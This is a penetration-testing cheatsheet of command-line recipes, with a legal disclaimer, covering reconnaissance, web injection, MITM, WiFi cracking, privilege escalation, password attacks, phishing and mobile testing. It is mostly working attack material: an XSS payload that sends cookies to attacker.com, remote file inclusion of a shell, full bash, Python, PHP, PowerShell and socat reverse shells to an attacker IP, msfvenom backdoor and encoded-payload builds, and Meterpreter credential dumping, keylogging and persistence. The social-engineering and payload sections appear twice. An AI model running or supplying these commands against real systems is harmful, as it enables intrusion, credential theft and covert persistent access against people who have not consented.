COMPLETE PENETRATION TESTING CHEATSHEET
⚠️ LEGAL DISCLAIMER: The information provided in this cheatsheet is for educational purposes only.
Only perform penetration testing on systems you own or have explicit written permission to test. Unauthorized
access to computer systems is illegal and punishable by law.
🔍 1. Reconnaissance & Information Gathering
Passive Reconnaissance
Gather information without directly interacting with the target
# WHOIS Lookup
whois domain.com
# DNS Enumeration
dig domain.com ANY
host -t ns domain.com
nslookup domain.com
# Search engine reconnaissance
# Google Dorks:
site:domain.com filetype:pdf
site:domain.com inurl:admin
site:domain.com intitle:"index of"
# Subdomain enumeration
sublist3r -d domain.com
amass enum -d domain.com
subfinder -d domain.com
# Shodan (Internet-connected devices)
shodan search "org:Company Name"
# theHarvester (email, subdomains, hosts)
theHarvester -d domain.com -b google
# Certificate Transparency Logs
# Visit: crt.sh
curl "https://crt.sh/?q=%25.domain.com&output=json"
Active Reconnaissance
# DNS Zone Transfer
dig axfr @ns1.domain.com domain.com
# DNS Brute Force
dnsrecon -d domain.com -t brt -D /usr/share/wordlists/dns.txt
# Find Email Addresses
hunter.io
phonebook.cz
# OSINT Framework
# Visit: osintframework.com
🎯 2. Scanning & Enumeration
Nmap - Port Scanning
# Basic scan
nmap -sV -sC target.com
# Full TCP scan
nmap -p- -sV -sC -A target.com
# UDP scan
nmap -sU -p 53,67,68,161 target.com
# Stealth SYN scan
nmap -sS target.com
# OS Detection
nmap -O target.com
# Aggressive scan
nmap -A -T4 target.com
# Scan specific ports
nmap -p 80,443,8080 target.com
# Scan entire subnet
nmap -sn 192.168.1.0/24
# Output to all formats
nmap -oA scan_results target.com
# Nmap scripts
nmap --script vuln target.com
nmap --script http-enum target.com
nmap --script smb-enum-shares target.com
Service Enumeration
# SMB Enumeration
enum4linux -a target.com
smbclient -L //target.com
smbmap -H target.com
# NFS Enumeration
showmount -e target.com
# SNMP Enumeration
snmpwalk -c public -v1 target.com
onesixtyone -c community.txt target.com
# LDAP Enumeration
ldapsearch -x -h target.com -s base
# FTP Enumeration
nmap --script ftp-anon target.com -p 21
🌐 3. Web Application Testing
Directory & File Discovery
# Gobuster
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
# Dirbuster / Dirb
dirb http://target.com
# Ffuf
ffuf -w /path/to/wordlist -u http://target.com/FUZZ
# Nikto
nikto -h http://target.com
SQL Injection
# Manual Testing
# Try: ' OR '1'='1
# Try: admin' --
# Try: ' UNION SELECT NULL--
# SQLMap
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database --tables
sqlmap -u "http://target.com/page.php?id=1" -D database -T users --dump
sqlmap -u "http://target.com/page.php?id=1" --batch --level=5 --risk=3
# POST request
sqlmap -u "http://target.com/login" --data="user=admin&pass=admin"
# With authentication
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abcd1234"
Cross-Site Scripting (XSS)
# Basic XSS Payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Cookie Stealing
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>
# XSStrike
xsstrike -u "http://target.com/search?q=test"
# DOM-based XSS
javascript:alert(document.domain)
Command Injection
# Test with these payloads:
; ls
| whoami
& cat /etc/passwd
`id`
$(uname -a)
# Time-based detection
; sleep 10
| ping -c 10 127.0.0.1
Local/Remote File Inclusion
# LFI (Local File Inclusion)
http://target.com/page.php?file=../../../../etc/passwd
http://target.com/page.php?file=....//....//....//etc/passwd
http://target.com/page.php?file=/etc/passwd%00
# LFI to RCE
http://target.com/page.php?file=/var/log/apache2/access.log
# (After poisoning log file with PHP code)
# RFI (Remote File Inclusion)
http://target.com/page.php?file=http://attacker.com/shell.txt
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
Burp Suite
# Proxy: 127.0.0.1:8080
# Key Features:
- Intercept and modify requests
- Spider/Crawler
- Intruder (automated attacks)
- Repeater (modify & resend requests)
- Scanner (Pro version)
- Decoder/Comparer
# Configure browser proxy:
Firefox: Settings > Network > Manual Proxy
HTTP Proxy: 127.0.0.1, Port: 8080
🌐 4. Network Penetration Testing
ARP Spoofing / MITM
# Ettercap
ettercap -T -M arp:remote /target_ip/ /gateway_ip/
# ARPSpoof
arpspoof -i eth0 -t target_ip gateway_ip
# Bettercap
bettercap -iface eth0
> set arp.spoof.targets target_ip
> arp.spoof on
> net.sniff on
Network Sniffing
# Wireshark Filters
http.request.method == "POST"
tcp.port == 80
ip.addr == 192.168.1.100
# TCPDump
tcpdump -i eth0 port 80
tcpdump -i eth0 -w capture.pcap
tcpdump -r capture.pcap
# Tshark
tshark -i eth0 -Y http.request
DNS Spoofing
# Using Ettercap
# Edit: /etc/ettercap/etter.dns
# Add: target.com A attacker_ip
ettercap -T -M arp:remote -P dns_spoof /target_ip/ /gateway_ip/
📡 5. Wireless (WiFi) Penetration Testing
WiFi Reconnaissance
# Enable monitor mode
airmon-ng start wlan0
# Scan for networks
airodump-ng wlan0mon
# Target specific network
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon
WPA/WPA2 Cracking
# Capture handshake
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon
# Deauth clients to capture handshake
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack with Aircrack-ng
aircrack-ng -w /path/to/wordlist.txt capture-01.cap
# Crack with Hashcat
hashcat -m 2500 capture.hccapx /path/to/wordlist.txt
# Convert cap to hccapx
cap2hccapx capture-01.cap output.hccapx
WPS Attack
# Reaver (WPS PIN attack)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Wash (detect WPS)
wash -i wlan0mon
# Bully
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
Evil Twin Attack
# Create fake AP
airbase-ng -e "FakeWiFi" -c 6 wlan0mon
# Wifiphisher
wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgrade
# Fluxion
fluxion
☁️ 6. Cloud Penetration Testing
AWS Enumeration
# AWS CLI Configuration
aws configure
# List S3 Buckets
aws s3 ls
aws s3 ls s3://bucket-name
# Check bucket permissions
aws s3api get-bucket-acl --bucket bucket-name
# Download from public bucket
aws s3 sync s3://bucket-name . --no-sign-request
# EC2 Enumeration
aws ec2 describe-instances
aws ec2 describe-security-groups
# IAM Enumeration
aws iam list-users
aws iam list-roles
aws iam get-user
# S3 Scanner
s3scanner scan --buckets-file buckets.txt
Azure Enumeration
# Azure CLI
az login
az account list
# List VMs
az vm list
# List storage accounts
az storage account list
# MicroBurst (PowerShell)
Import-Module MicroBurst.psm1
Get-AzureDomainInfo -Verbose
Google Cloud Platform (GCP)
# GCloud CLI
gcloud auth login
gcloud projects list
# List instances
gcloud compute instances list
# List storage buckets
gsutil ls
# GCPBucketBrute
python3 gcpbucketbrute.py -k keywords.txt
Docker/Kubernetes
# Docker
docker ps
docker images
docker exec -it container_id /bin/bash
# Kubernetes
kubectl get pods
kubectl get secrets
kubectl exec -it pod_name -- /bin/bash
# kube-hunter
kube-hunter --remote ip_address
💥 7. Exploitation & Post-Exploitation
Metasploit Framework
# Start Metasploit
msfconsole
# Search for exploits
search type:exploit platform:windows smb
# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
# Set options
set RHOSTS target_ip
set LHOST attacker_ip
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Run exploit
exploit
# Common Payloads
windows/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
php/meterpreter/reverse_tcp
# Multi Handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit -j
Reverse Shells
# Netcat Listener
nc -lvnp 4444
# Bash Reverse Shell
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP Reverse Shell
php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# PowerShell Reverse Shell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("attacker_ip",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Upgrading Shells
# Python PTY
python -c 'import pty; pty.spawn("/bin/bash")'
# Fully Interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg
export TERM=xterm
# Socat
# On attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# On victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:attacker_ip:4444
Meterpreter Commands
# System Info
sysinfo
getuid
ps
# Navigation
pwd
cd C:\\
ls
# File Operations
download C:\\file.txt
upload /path/to/file C:\\
# Privilege Escalation
getsystem
# Dump Passwords
hashdump
load kiwi
creds_all
# Persistence
run persistence -X -i 10 -p 4444 -r attacker_ip
# Screenshot
screenshot
# Keylogger
keyscan_start
keyscan_dump
# Port Forwarding
portfwd add -l 3389 -p 3389 -r target_ip
⬆️ 8. Privilege Escalation
Linux Privilege Escalation
# Enumeration Scripts
# LinPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
./LinEnum.sh
# Manual Checks
# SUID Files
find / -perm -4000 -type f 2>/dev/null
# Writable /etc/passwd
ls -la /etc/passwd
# Sudo Rights
sudo -l
# Cron Jobs
cat /etc/crontab
crontab -l
ls -la /etc/cron*
# Capabilities
getcap -r / 2>/dev/null
# Kernel Exploits
uname -a
searchsploit linux kernel 4.4.0
# PATH Injection
echo $PATH
# NFS Shares
cat /etc/exports
showmount -e target_ip
# Docker Escape
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Windows Privilege Escalation
# Enumeration Scripts
# WinPEAS
winpeas.exe
# PowerUp
powershell -ep bypass
Import-Module PowerUp.ps1
Invoke-AllChecks
# Manual Checks
# System Info
systeminfo
whoami /all
# Unquoted Service Paths
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
# Weak Service Permissions
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
# AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# Scheduled Tasks
schtasks /query /fo LIST /v
# Stored Credentials
cmdkey /list
runas /savecred /user:admin cmd.exe
# Registry Autoruns
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# Kernel Exploits
# Check with: systeminfo
# Use: Windows-Exploit-Suggester
GTFOBins / LOLBAS
# GTFOBins (Linux)
# Visit: gtfobins.github.io
# Example: vim, find, less, etc.
# LOLBAS (Windows)
# Visit: lolbas-project.github.io
# Example: certutil, bitsadmin, etc.
🔐 9. Password Attacks
Hash Cracking
# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --format=NT hashes.txt
john --show hashes.txt
# Hashcat
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
# -m 0 = MD5
# -m 100 = SHA1
# -m 1000 = NTLM
# -m 1800 = sha512crypt
# Generate wordlist with rules
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule wordlist.txt > mutated.txt
# Identify Hash Type
hashid hash.txt
hash-identifier
Brute Force Attacks
# Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip
hydra -L users.txt -P passwords.txt target_ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
hydra -l admin -P passwords.txt ftp://target_ip
hydra -l admin -P passwords.txt rdp://target_ip
# Medusa
medusa -h target_ip -u admin -P passwords.txt -M ssh
# Ncrack
ncrack -p 22 --user admin -P passwords.txt target_ip
# Patator
patator ssh_login host=target_ip user=admin password=FILE0 0=passwords.txt
Wordlist Generation
# Crunch
crunch 8 8 -t ,@@^^%%% -o wordlist.txt
# , = uppercase
# @ = lowercase
# % = numbers
# ^ = symbols
# Cewl (from website)
cewl -d 2 -m 5 http://target.com -w wordlist.txt
# Username generator (from names)
# https://github.com/urbanadventurer/username-anarchy
./username-anarchy John Smith > users.txt
Password Spraying
# CrackMapExec
crackmapexec smb target_ip -u users.txt -p 'Password123'
# Spray (for O365)
python spray.py -U users.txt -P 'Password123' -d domain.com
🎭 10. Social Engineering
Phishing
# SET (Social Engineering Toolkit)
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method
# Gophish
# Web-based phishing framework
./gophish
# Access: https://localhost:3333
# King Phisher
# Advanced phishing campaign toolkit
Payload Generation
# Msfvenom
# Windows EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf > shell.elf
# PHP Backdoor
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw > shell.php
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 R > app.apk
# Windows Macro
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f vba
# Encoded Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe
📱 11. Mobile Application Testing
Android
# ADB (Android Debug Bridge)
adb devices
adb shell
adb pull /data/data/com.app/databases/app.db
# Decompile APK
apktool d app.apk
# Convert APK to JAR
d2j-dex2jar app.apk
# View JAR with JD-GUI
jd-gui app-dex2jar.jar
# MobSF (Mobile Security Framework)
# Upload APK for analysis
# Frida (Dynamic instrumentation)
frida-ps -U
frida -U -f com.app.name -l script.js
iOS
# Requires Jailbroken device
# SSH to device
ssh root@device_ip
# Default password: alpine
# Cycript
cycript -p AppName
# Class-dump-z
class-dump-z App.app -H -o headers/
# Frida
frida-ps -U
frida -U AppName -l script.js
💡 Best Practices
- Always get written authorization before testing
- Document everything thoroughly
- Use VPN/anonymization when appropriate
- Keep your tools updated
- Practice in legal environments (HTB, THM, etc.)
- Understand the tools, don't just run them blindly
- Follow responsible disclosure for vulnerabilities
🎭 10. Social Engineering
Phishing
# SET (Social Engineering Toolkit)
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method
# Gophish
# Web-based phishing framework
./gophish
# Access: https://localhost:3333
# King Phisher
# Advanced phishing campaign toolkit
Payload Generation
# Msfvenom
# Windows EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf > shell.elf
# PHP Backdoor
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw > shell.php
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 R > app.apk
# Windows Macro
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f vba
# Encoded Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe